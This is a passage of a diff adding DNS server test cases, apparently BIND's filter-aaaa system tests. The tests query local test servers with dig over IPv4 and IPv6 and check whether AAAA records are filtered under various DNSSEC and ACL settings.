NODATA/NOERROR is returned when both AAAA and A records exist, signed, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.signed -b 10.53.0.3 @10.53.0.3 > dig.out.ns3.test$n || 
ret=1
+grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns3.test$n > /dev/null && ret=1
+grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, unsigned, recursive with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS aaaa dual.unsigned -b 10.53.0.3 @10.53.0.3 > dig.out.ns3.test$n || ret=1
+grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns3.test$n > /dev/null && ret=1
+grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, signed and DO set, recursive with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS aaaa dual.signed +dnssec -b 10.53.0.3 @10.53.0.3 > dig.out.ns3.test$n || ret=1
+grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns3.test$n > /dev/null && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, unsigned and DO set, recursive with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS aaaa dual.unsigned +dnssec -b 10.53.0.3 @10.53.0.3 > dig.out.ns3.test$n || ret=1
+grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns3.test$n > /dev/null && ret=1
+grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that AAAA is returned when both AAAA and A records exist and query source does not match acl, recursive with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS aaaa dual.unsigned -b 10.53.0.1 @10.53.0.3 > 
dig.out.ns3.test$n || ret=1
+grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1
+grep ::6 dig.out.ns3.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, signed and qtype=ANY with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS any dual.signed -b 10.53.0.3 @10.53.0.3 > dig.out.ns3.test$n || ret=1
+grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1
+grep "1.0.0.3" dig.out.ns3.test$n > /dev/null || ret=1
+grep "::3" dig.out.ns3.test$n > /dev/null && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, unsigned and qtype=ANY with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS any dual.unsigned -b 10.53.0.3 @10.53.0.3 > dig.out.ns3.test$n || ret=1
+grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1
+grep "1.0.0.6" dig.out.ns3.test$n > /dev/null || ret=1
+grep "::6" dig.out.ns3.test$n > /dev/null && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, signed, qtype=ANY and DO is set with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS any dual.signed +dnssec -b 10.53.0.3 @10.53.0.3 > dig.out.ns3.test$n || ret=1
+grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1
+grep "1.0.0.3" dig.out.ns3.test$n > /dev/null || ret=1
+grep ::3 dig.out.ns3.test$n > /dev/null && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, unsigned, qtype=ANY and DO is set with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS any dual.unsigned +dnssec -b 10.53.0.3 @10.53.0.3 > dig.out.ns3.test$n || ret=1
+grep "status: NOERROR" 
dig.out.ns3.test$n > /dev/null || ret=1
+grep "1.0.0.6" dig.out.ns3.test$n > /dev/null || ret=1
+grep "::6" dig.out.ns3.test$n > /dev/null && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that both A and AAAA are returned when both AAAA and A records exist, qtype=ANY and query source does not match acl, recursive with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS any dual.unsigned -b 10.53.0.1 @10.53.0.3 > dig.out.ns3.test$n || ret=1
+grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1
+grep 1.0.0.6 dig.out.ns3.test$n > /dev/null || ret=1
+grep ::6 dig.out.ns3.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that AAAA is returned when both AAAA and A record exists, unsigned over IPv6, recursive with break-dnssec ($n)"
+if testsock6 fd92:7065:b8e:ffff::3
+then
+ret=0
+$DIG $DIGOPTS aaaa dual.unsigned -b fd92:7065:b8e:ffff::3 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1
+grep 2001:db8::6 dig.out.ns3.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+else
+echo_i "skipped." 
+fi
+
+n=`expr $n + 1`
+echo_i "checking that AAAA is omitted from additional section, qtype=NS, recursive with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS +add ns unsigned -b 10.53.0.3 @10.53.0.3 > dig.out.ns3.test$n || ret=1
+grep AAAA dig.out.ns3.test$n > /dev/null 2>&1 && ret=1
+grep "ADDITIONAL: 2" dig.out.ns3.test$n > /dev/null 2>&1 || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that AAAA is omitted from additional section, qtype=MX, unsigned, recursive with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS +add +dnssec mx unsigned -b 10.53.0.3 @10.53.0.3 > dig.out.ns3.test$n || ret=1
+grep "^mx.unsigned.*AAAA" dig.out.ns3.test$n > /dev/null 2>&1 && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that AAAA is omitted from additional section, qtype=MX, signed, recursive with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS +add +dnssec mx signed -b 10.53.0.3 @10.53.0.3 > dig.out.ns3.test$n || ret=1
+grep "^mx.signed.*AAAA" dig.out.ns3.test$n > /dev/null 2>&1 && ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns3.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that AAAA is included in additional section, qtype=MX, unsigned, over IPv6, recursive with break-dnssec ($n)"
+if testsock6 fd92:7065:b8e:ffff::3
+then
+ret=0
+$DIG $DIGOPTS +add +dnssec mx unsigned -b fd92:7065:b8e:ffff::3 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1
+grep "^mx.unsigned.*AAAA" dig.out.ns3.test$n > /dev/null 2>&1 || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+else
+echo_i "skipped."
+fi
+
+if ! 
testsock6 fd92:7065:b8e:ffff::1
+then
+ echo_i "IPv6 address not configured; skipping IPv6 query tests"
+ echo_i "exit status: $status"
+ exit $status
+fi
+
+# Reconfiguring for IPv6 tests
+echo_i "reconfiguring servers"
+copy_setports ns1/named2.conf.in ns1/named.conf
+rndc_reconfig ns1 10.53.0.1
+copy_setports ns2/named2.conf.in ns2/named.conf
+rndc_reconfig ns2 10.53.0.2
+copy_setports ns3/named2.conf.in ns3/named.conf
+rndc_reconfig ns3 10.53.0.3
+copy_setports ns4/named2.conf.in ns4/named.conf
+rndc_reconfig ns4 10.53.0.4
+
+# BEGIN IPv6 TESTS
+
+#
+# Authoritative tests against:
+# filter-aaaa-on-v6 yes;
+# filter-aaaa { fd92:7065:b8e:ffff::1; };
+#
+n=`expr $n + 1`
+echo_i "checking that AAAA is returned when only AAAA record exists, signed ($n)"
+ret=0
+$DIG $DIGOPTS aaaa aaaa-only.signed -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1
+grep ::2 dig.out.ns1.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that AAAA is returned when only AAAA record exists, unsigned ($n)"
+ret=0
+$DIG $DIGOPTS aaaa aaaa-only.unsigned -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1
+grep ::5 dig.out.ns1.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, signed ($n)"
+ret=0
+$DIG $DIGOPTS aaaa dual.signed -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1
+grep "ANSWER: 0" dig.out.ns1.test$n > /dev/null || ret=1
+grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, unsigned ($n)"
+ret=0
+$DIG $DIGOPTS aaaa dual.unsigned -b fd92:7065:b8e:ffff::1 
@fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1
+grep "ANSWER: 0" dig.out.ns1.test$n > /dev/null || ret=1
+grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that AAAA is returned when both AAAA and A records exist, signed and DO set ($n)"
+ret=0
+$DIG $DIGOPTS aaaa dual.signed +dnssec -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1
+grep ::3 dig.out.ns1.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, unsigned and DO set ($n)"
+ret=0
+$DIG $DIGOPTS aaaa dual.unsigned -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1
+grep "ANSWER: 0" dig.out.ns1.test$n > /dev/null || ret=1
+grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that AAAA is returned when both AAAA and A records exist and query source does not match acl ($n)"
+ret=0
+$DIG $DIGOPTS aaaa dual.unsigned -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1
+grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1
+grep ::6 dig.out.ns1.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, signed and qtype=ANY ($n)"
+ret=0
+$DIG $DIGOPTS any dual.signed -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1
+grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1
+grep "1.0.0.3" dig.out.ns1.test$n > /dev/null || ret=1
+grep "::3" dig.out.ns1.test$n > /dev/null && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret` 
+
+n=`expr $n + 1`
+echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, unsigned and qtype=ANY ($n)"
+ret=0
+$DIG $DIGOPTS any dual.unsigned -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1
+grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1
+grep "1.0.0.6" dig.out.ns1.test$n > /dev/null || ret=1
+grep "::6" dig.out.ns1.test$n > /dev/null && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that both A and AAAA are returned when both AAAA and A records exist, signed, qtype=ANY and DO is set ($n)"
+ret=0
+$DIG $DIGOPTS any dual.signed +dnssec -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1
+grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1
+grep ::3 dig.out.ns1.test$n > /dev/null || ret=1
+grep "1.0.0.3" dig.out.ns1.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, unsigned, qtype=ANY and DO is set ($n)"
+ret=0
+$DIG $DIGOPTS any dual.unsigned +dnssec -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1
+grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1
+grep "1.0.0.6" dig.out.ns1.test$n > /dev/null || ret=1
+grep "::6" dig.out.ns1.test$n > /dev/null && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that both A and AAAA are returned when both AAAA and A records exist, qtype=ANY and query source does not match acl ($n)"
+ret=0
+$DIG $DIGOPTS any dual.unsigned -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1
+grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1
+grep 1.0.0.6 dig.out.ns1.test$n > /dev/null || ret=1
+grep ::6 dig.out.ns1.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then 
echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that AAAA is returned when both AAAA and A record exists, unsigned over IPv4 ($n)"
+ret=0
+$DIG $DIGOPTS aaaa dual.unsigned -b 10.53.0.1 @10.53.0.1 > dig.out.ns1.test$n || ret=1
+grep 2001:db8::6 dig.out.ns1.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that AAAA is omitted from additional section, qtype=NS ($n)"
+ret=0
+$DIG $DIGOPTS +add +dnssec ns unsigned -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1
+grep AAAA dig.out.ns1.test$n > /dev/null 2>&1 && ret=1
+grep "ADDITIONAL: 2" dig.out.ns1.test$n > /dev/null 2>&1 || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that AAAA is omitted from additional section, qtype=MX, unsigned ($n)"
+ret=0
+$DIG $DIGOPTS +add +dnssec mx unsigned -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1
+grep "^mx.unsigned.*AAAA" dig.out.ns1.test$n > /dev/null 2>&1 && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that AAAA is included in additional section, qtype=MX, signed ($n)"
+ret=0
+$DIG $DIGOPTS +add +dnssec mx signed -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1
+grep "^mx.signed.*AAAA" dig.out.ns1.test$n > /dev/null 2>&1 || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that AAAA is included in additional section, qtype=MX, unsigned, over IPv4 ($n)"
+ret=0
+$DIG $DIGOPTS +add +dnssec mx unsigned -b 10.53.0.1 @10.53.0.1 > dig.out.ns1.test$n || ret=1
+grep "^mx.unsigned.*AAAA" dig.out.ns1.test$n > /dev/null 2>&1 || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+
+#
+# Authoritative tests against:
+# filter-aaaa-on-v6 
break-dnssec;
+# filter-aaaa { fd92:7065:b8e:ffff::4; };
+#
+n=`expr $n + 1`
+echo_i "checking that AAAA is returned when only AAAA record exists, signed with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS aaaa aaaa-only.signed -b fd92:7065:b8e:ffff::4 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1
+grep ::2 dig.out.ns4.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that AAAA is returned when only AAAA record exists, unsigned with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS aaaa aaaa-only.unsigned -b fd92:7065:b8e:ffff::4 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1
+grep ::5 dig.out.ns4.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, signed with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS aaaa dual.signed -b fd92:7065:b8e:ffff::4 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1
+grep "ANSWER: 0" dig.out.ns4.test$n > /dev/null || ret=1
+grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, unsigned with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS aaaa dual.unsigned -b fd92:7065:b8e:ffff::4 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1
+grep "ANSWER: 0" dig.out.ns4.test$n > /dev/null || ret=1
+grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, signed and DO set with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS aaaa dual.signed +dnssec -b fd92:7065:b8e:ffff::4 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1
+grep "ANSWER: 0" 
dig.out.ns4.test$n > /dev/null || ret=1
+grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, unsigned and DO set with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS aaaa dual.unsigned -b fd92:7065:b8e:ffff::4 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1
+grep "ANSWER: 0" dig.out.ns4.test$n > /dev/null || ret=1
+grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that AAAA is returned when both AAAA and A records exist and query source does not match acl with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS aaaa dual.unsigned -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1
+grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+grep ::6 dig.out.ns4.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, signed and qtype=ANY with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS any dual.signed -b fd92:7065:b8e:ffff::4 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1
+grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+grep "1.0.0.3" dig.out.ns4.test$n > /dev/null || ret=1
+grep "::3" dig.out.ns4.test$n > /dev/null && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, unsigned and qtype=ANY with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS any dual.unsigned -b fd92:7065:b8e:ffff::4 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1
+grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+grep "1.0.0.6" dig.out.ns4.test$n > /dev/null || 
ret=1
+grep "::6" dig.out.ns4.test$n > /dev/null && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, signed, qtype=ANY and DO is set with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS any dual.signed +dnssec -b fd92:7065:b8e:ffff::4 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1
+grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+grep "1.0.0.3" dig.out.ns4.test$n > /dev/null || ret=1
+grep ::3 dig.out.ns4.test$n > /dev/null && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, unsigned, qtype=ANY and DO is set with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS any dual.unsigned +dnssec -b fd92:7065:b8e:ffff::4 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1
+grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+grep "1.0.0.6" dig.out.ns4.test$n > /dev/null || ret=1
+grep "::6" dig.out.ns4.test$n > /dev/null && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that both A and AAAA are returned when both AAAA and A records exist, qtype=ANY and query source does not match acl with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS any dual.unsigned -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1
+grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+grep 1.0.0.6 dig.out.ns4.test$n > /dev/null || ret=1
+grep ::6 dig.out.ns4.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that AAAA is returned when both AAAA and A record exists, unsigned over IPv4 with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS aaaa dual.unsigned -b 10.53.0.4 @10.53.0.4 > dig.out.ns4.test$n || ret=1
+grep 2001:db8::6 
dig.out.ns4.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that AAAA is omitted from additional section, qtype=NS, with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS +add +dnssec ns unsigned -b fd92:7065:b8e:ffff::4 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1
+grep AAAA dig.out.ns4.test$n > /dev/null 2>&1 && ret=1
+grep "ADDITIONAL: 2" dig.out.ns4.test$n > /dev/null 2>&1 || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that AAAA is omitted from additional section, qtype=MX, unsigned, with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS +add +dnssec mx unsigned -b fd92:7065:b8e:ffff::4 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1
+grep "^mx.unsigned.*AAAA" dig.out.ns4.test$n > /dev/null 2>&1 && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that AAAA is omitted from additional section, qtype=MX, signed, with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS +add +dnssec mx signed -b fd92:7065:b8e:ffff::4 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1
+grep "^mx.signed.*AAAA" dig.out.ns4.test$n > /dev/null 2>&1 && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that AAAA is included in additional section, qtype=MX, unsigned, over IPv4, with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS +add +dnssec mx unsigned -b 10.53.0.4 @10.53.0.4 > dig.out.ns4.test$n || ret=1
+grep "^mx.unsigned.*AAAA" dig.out.ns4.test$n > /dev/null 2>&1 || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+
+#
+# Recursive tests against:
+# filter-aaaa-on-v6 yes;
+# filter-aaaa { fd92:7065:b8e:ffff::2; };
+#
+n=`expr $n + 1`
+echo_i "checking that AAAA is returned when only AAAA record exists, signed, recursive ($n)"
+ret=0
+$DIG $DIGOPTS aaaa aaaa-only.signed -b 
fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null || ret=1
+grep ::2 dig.out.ns2.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that AAAA is returned when only AAAA record exists, unsigned, recursive ($n)"
+ret=0
+$DIG $DIGOPTS aaaa aaaa-only.unsigned -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1
+grep ::5 dig.out.ns2.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, signed, recursive ($n)"
+ret=0
+$DIG $DIGOPTS aaaa dual.signed -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1
+grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null && ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, unsigned, recursive ($n)"
+ret=0
+$DIG $DIGOPTS aaaa dual.unsigned -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1
+grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null && ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that AAAA is returned when both AAAA and A records exist, signed and DO set, recursive ($n)"
+ret=0
+$DIG $DIGOPTS aaaa dual.signed +dnssec -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null || ret=1
+grep ::3 dig.out.ns2.test$n > 
/dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, unsigned and DO set, recursive ($n)"
+ret=0
+$DIG $DIGOPTS aaaa dual.unsigned +dnssec -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1
+grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null && ret=1
